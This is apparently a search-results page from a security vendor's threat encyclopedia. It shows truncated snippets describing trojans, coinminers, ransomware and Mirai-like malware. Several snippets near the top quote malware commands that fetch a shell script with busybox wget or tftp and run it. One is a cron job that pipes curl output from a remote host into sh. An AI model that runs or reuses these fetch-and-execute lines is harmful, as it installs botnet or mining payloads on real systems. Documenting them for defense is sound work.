Search
Keyword: usojan.sh.mirai.mkf
bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' cd /tmp/; busybox wget http://{BLOCKED}6.{BLOCKED}0.250.37/.{BLOCKED}ggers/bin2.sh; busybox tftp -r bin2.sh -g {BLOCKED}6.{BLOCKED}0.250.37; sh bin2.sh; echo
}0.250.37/.{BLOCKED}ggers/bin2.sh; busybox tftp -r bin2.sh -g {BLOCKED}6.{BLOCKED}0.250.37; sh bin2.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' Linux/Agent.AL (ESET) Downloaded from the Internet Executes files
/tmp/; busybox wget http://{BLOCKED}6.{BLOCKED}0.250.37/.{BLOCKED}ggers/bin2.sh; busybox tftp -r bin2.sh -g 176.10.250.37; sh bin2.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74' Linux/Agent.AL (ESET)
* * * * curl -fsSL http://w.{BLOCKED}i.xyz:43768/crontab.sh | sh It blocks all outgoing SSH connections on the following ports: 3333 5555 7777 9999 14444 It modifies the system's HOSTS files to prevent users
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Potentially Unwanted Application arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This
This Trojan may be downloaded by other malware/grayware from remote sites. It requires its main component to successfully perform its intended routine. It deletes itself after execution. Arrival
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be downloaded by other malware/grayware from
This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It connects to certain websites to send and receive
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It encrypts files with specific file extensions. It
This Trojan may be unknowingly downloaded by a user while visiting malicious websites. Arrival Details This Trojan may be unknowingly downloaded by a user while visiting malicious websites.
This malware checks if the main executable is executed by root and the file name is "boomsh". If so, it then takes ownership and sets the permission (Read only, Execute Only, Full) to
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a